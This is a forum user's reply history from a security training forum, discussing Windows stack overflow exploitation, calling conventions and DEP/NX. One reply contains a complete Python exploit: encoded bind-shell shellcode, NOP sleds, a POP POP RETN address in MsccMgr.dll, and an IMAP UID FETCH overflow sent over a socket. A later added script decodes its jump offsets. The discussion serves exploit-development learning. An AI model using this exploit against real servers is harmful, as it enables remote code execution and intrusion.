zaixer

Forum Replies Created

Viewing 5 reply threads
  • Author
    Posts
    • #53216
      zaixer
      Participant

      I think DEP is Windows based and NX is Linux based… correct me please if I am wrong. The point is not to make it work only; it's about understanding why it did not work :). I do not like leaving it just because it did not work 🙂

    • #53119
      zaixer
      Participant


      “Aren’t the function parameters you’ve supplied (ptr to param1 in your example) getting popped also?
      I mean, if you overwrite saved EIP with some acceptable address, and after DoStuff returns, EIP gets popped off the stack, but these passed input parameters must be popped too?
      If I am correct, then ESP will point to “+ some bytes” after “EIP + input vars”, and not directly after “EIP”, and this is the reason you add four symbols before the shellcode (my $preshellcode = “XXXX”;)?
      Thank you!”

      and


      “I figured out my first question when I read this article http://en.wikipedia.org/wiki/X…..entions. In the C code I use to debug, if I define the DoStuff function as “void _cdecl DoStuff(char* param1)” or “void DoStuff(char* param1)”, then there is no need to adjust the shellcode with 4 more bytes. If I define the DoStuff function as “void _stdcall DoStuff(char* param1)”, then we have to adjust the shellcode with 4 more bytes. The difference is made by who is responsible for cleaning the arguments from the stack, the caller or the callee. Is it right?”

      The key point is that function arguments get popped off the stack too; that’s why ESP is pointing to higher address values. Also, this may differ from one function to another: as the first post indicates, it depends on who is responsible for cleaning the arguments from the stack!

    • #53201
      zaixer
      Participant

      @dynamik thanks for your response. For some reason it worked after adding some NOPs after the shellcode! Please check the code below:

      ====================================================================================================================
      import socket
      import sys

      shellcode = ("\xb8\x3b\xe5\xd0\x36\xda\xd3\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
      "\x56\x31\x42\x13\x83\xc2\x04\x03\x42\x34\x07\x25\xca\xa2\x4e"
      "\xc6\x33\x32\x31\x4e\xd6\x03\x63\x34\x92\x31\xb3\x3e\xf6\xb9"
      "\x38\x12\xe3\x4a\x4c\xbb\x04\xfb\xfb\x9d\x2b\xfc\xcd\x21\xe7"
      "\x3e\x4f\xde\xfa\x12\xaf\xdf\x34\x67\xae\x18\x28\x87\xe2\xf1"
      "\x26\x35\x13\x75\x7a\x85\x12\x59\xf0\xb5\x6c\xdc\xc7\x41\xc7"
      "\xdf\x17\xf9\x5c\x97\x8f\x72\x3a\x08\xb1\x57\x58\x74\xf8\xdc"
      "\xab\x0e\xfb\x34\xe2\xef\xcd\x78\xa9\xd1\xe1\x75\xb3\x16\xc5"
      "\x65\xc6\x6c\x35\x18\xd1\xb6\x47\xc6\x54\x2b\xef\x8d\xcf\x8f"
      "\x11\x42\x89\x44\x1d\x2f\xdd\x03\x02\xae\x32\x38\x3e\x3b\xb5"
      "\xef\xb6\x7f\x92\x2b\x92\x24\xbb\x6a\x7e\x8b\xc4\x6d\x26\x74"
      "\x61\xe5\xc5\x61\x13\xa4\x81\x46\x2e\x57\x52\xc0\x39\x24\x60"
      "\x4f\x92\xa2\xc8\x18\x3c\x34\x2e\x33\xf8\xaa\xd1\xbb\xf9\xe3"
      "\x15\xef\xa9\x9b\xbc\x8f\x21\x5c\x40\x5a\xe5\x0c\xee\x34\x46"
      "\xfd\x4e\xe4\x2e\x17\x41\xdb\x4f\x18\x8b\x6a\x48\xd6\xef\x3f"
      "\x3f\x1b\x10\xae\xe3\x92\xf6\xba\x0b\xf3\xa1\x52\xee\x20\x7a"
      "\xc5\x11\x03\xd6\x5e\x86\x1b\x30\x58\xa9\x9b\x16\xcb\x06\x33"
      "\xf1\x9f\x44\x80\xe0\xa0\x40\xa0\x6b\x99\x03\x3a\x02\x68\xb5"
      "\x3b\x0f\x1a\x56\xa9\xd4\xda\x11\xd2\x42\x8d\x76\x24\x9b\x5b"
      "\x6b\x1f\x35\x79\x76\xf9\x7e\x39\xad\x3a\x80\xc0\x20\x06\xa6"
      "\xd2\xfc\x87\xe2\x86\x50\xde\xbc\x70\x17\x88\x0e\x2a\xc1\x67"
      "\xd9\xba\x94\x4b\xda\xbc\x98\x81\xac\x20\x28\x7c\xe9\x5f\x85"
      "\xe8\xfd\x18\xfb\x88\x02\xf3\xbf\xb7\xf3\xc9\x55\x2f\xaa\xb8"
      "\x17\x2d\x4d\x17\x5b\x48\xce\x9d\x24\xaf\xce\xd4\x21\xeb\x48"
      "\x05\x58\x64\x3d\x29\xcf\x85\x14")

      buffer = "\x90" * 300 # NOP sled to fill the first 300 bytes before the shellcode
      buffer += shellcode # Shellcode to spawn a shell listening on port 4444
      buffer += "\x90" * 81 # NOP sled to fill the rest of the buffer after the shellcode
      buffer += "\xEB\x06\x90\x90" # Short JMP of 6 bytes
      buffer += "\x95\xcb\x0d\x60" # Memory address of POP POP RETN sequence in module MsccMgr.dll
      buffer += "\x90" * 8 + "\xe9\xff\xfc\xff\xff" # 8 bytes of NOPs followed by 700 bytes backward jump
      buffer += "}" * 50 # Junk

      s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

      try:
          s.connect((sys.argv[1], int(sys.argv[2])))
      except:
          print "Can't connect to server!\n"
          sys.exit(0)

      print "[+] Connecting to victim !"
      data = s.recv(1024)
      print "[+] " + data.rstrip()
      print "[+] Sending evil buffer..."
      s.send('A013 UID FETCH 4827313:4827313 ' + buffer + "\r\n")
      s.close()
      print "[+] Exploitation Successful\n"
      print "[+] Please Connect to port 4444 on victim IP now !\n"
      ==================================================================================================================
      So when moving the 81 NOPs that are after the shellcode and placing them before the shellcode (adding them to the 300 NOPs already there), the exploit fails !

      Actually I would appreciate letting me know what is meant by stack adjustment!

      @superkojiman I am connecting to it from local machine itself: nc 127.0.0.1 444 to avoid any network problems
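      As an added example (not code from the post, and not part of the exploit it quotes), the script below rebuilds the buffer layout described in the listing with placeholder bytes in place of the shellcode and the handler address, then decodes the two relative jumps (EB rel8 and E9 rel32) to see where each one lands. The one assumption is the shellcode length, taken as 368 bytes by counting the listing; every other size comes from the comments in the post. This is the kind of offset check an analyst does when reading a captured payload, and it also shows that moving the 81 trailing NOPs in front of the shellcode does not change where the backward jump lands.

```python
# Added example, not from the forum post: walk the buffer layout and decode
# the two x86 relative jumps to find their landing offsets.

SHELLCODE_LEN = 368  # assumption: counted from the shellcode listing in the post

# Placeholder bytes stand in for the shellcode and the POP/POP/RET address;
# only the sizes and the two jump encodings matter for this analysis.
SECTIONS = [
    ("nop sled",    b"\x90" * 300),
    ("shellcode",   b"S" * SHELLCODE_LEN),
    ("nops after",  b"\x90" * 81),
    ("short jmp",   b"\xEB\x06\x90\x90"),          # EB 06: jmp rel8 (+6)
    ("pop pop ret", b"ADDR"),                      # placeholder handler address
    ("nops + jmp",  b"\x90" * 8 + b"\xE9\xFF\xFC\xFF\xFF"),  # E9: jmp rel32
    ("junk",        b"}" * 50),
]

# Same sections with the trailing NOPs moved in front of the shellcode,
# the rearrangement the post says made the exploit fail.
SECTIONS_SWAPPED = [SECTIONS[0], SECTIONS[2], SECTIONS[1]] + SECTIONS[3:]


def build(sections):
    """Concatenate the sections and record each one's [start, end) offsets."""
    buf, offsets, pos = b"", {}, 0
    for name, data in sections:
        offsets[name] = (pos, pos + len(data))
        buf += data
        pos += len(data)
    return buf, offsets


def decode_rel_jmp(buf, off):
    """Decode an x86 EB rel8 or E9 rel32 jump at buf[off].

    Returns (instruction length, landing offset). The displacement is
    signed and relative to the first byte after the jump instruction.
    """
    op = buf[off]
    if op == 0xEB:
        rel, size = int.from_bytes(buf[off + 1:off + 2], "little", signed=True), 2
    elif op == 0xE9:
        rel, size = int.from_bytes(buf[off + 1:off + 5], "little", signed=True), 5
    else:
        raise ValueError("no relative jmp at offset %d (opcode 0x%02x)" % (off, op))
    return size, off + size + rel


def section_at(offsets, target):
    """Name of the section containing a buffer offset, or None if outside."""
    for name, (start, end) in offsets.items():
        if start <= target < end:
            return name
    return None


def analyze(sections=SECTIONS):
    """Decode both jumps and report where each lands within the layout."""
    buf, offsets = build(sections)
    short_off = offsets["short jmp"][0]
    _, short_target = decode_rel_jmp(buf, short_off)
    long_off = offsets["nops + jmp"][0] + 8        # E9 follows the 8 NOPs
    _, long_target = decode_rel_jmp(buf, long_off)
    return {
        "total": len(buf),
        "short_jmp": (short_off, short_target, section_at(offsets, short_target)),
        "long_jmp": (long_off, long_target, section_at(offsets, long_target)),
    }


if __name__ == "__main__":
    for layout_name, layout in (("original", SECTIONS), ("swapped", SECTIONS_SWAPPED)):
        print(layout_name, analyze(layout))
```

      The short jump skips the four handler-address bytes and lands on the first of the 8 NOPs; the rel32 displacement 0xFFFFFCFF is -769, so the backward jump lands at offset 1 of the buffer, at the top of the NOP sled. With the 81 NOPs moved in front of the shellcode both jumps decode to the same offsets, so the jump arithmetic alone does not explain the failure described above.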

    • #53117
      zaixer
      Participant

      After searching I found the answers:

      1- Why was EBP not overwritten with the buffer?

      Answer here :
      http://msdn.microsoft.com/en-us/library/2kxx5t2c(v=vs.71).aspx

      2- Isn't it expected that the supplied buffer starts from the ESP and goes downwards towards the EIP at the bottom of the stack? Which means that the ESP should point to AAAAAAA instead of CCCCCCCCC?

      Answer here:
      https://www.corelan.be/index.php/forum/exploit-writing-win32-stack-bof-direct-ret/question-about-esp-in-tutorial-pt1/

    • #53193
      zaixer
      Participant

      Thanks Hany,

      Actually I have already reviewed it; however, I doubt that it is a working one, as the shellcode used contains bad chars like \x00!

    • #53116
      zaixer
      Participant

      Thanks for the help. You cleared the confusion !


Copyright ©2020 Caendra, Inc.
